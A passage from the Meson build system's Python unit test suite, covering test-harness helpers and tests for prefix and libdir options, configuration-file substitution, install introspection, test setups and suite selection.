args += ['--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args, override_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
with mock.patch.dict(os.environ, override_envvars):
run_mtest_inprocess(['-C', self.builddir])
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def get_meson_log_sanitychecks(self):
'''
Same as above, but for the sanity checks that were run
'''
log = self.get_meson_log()
prefix = 'Sanity check compiler command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
return '\n'.join(result)
def check_formats(confdata, result):
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)
confdata = ConfigurationData()
# Key error as they do not exists
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False, 'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True, 'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value', 'description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10, 'description')}
check_formats(confdata, '#define VAR 10\n')
# Check multiple string with cmake formats
confdata.values = {'VAR': ('value', 'description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value')
# Handles meson format exceptions
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@')
# Dict value in confdata
confdata.values = {'VAR': (['value'], 'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_force_fallback_for(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--force-fallback-for=zlib,foo'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ):
raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2')
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
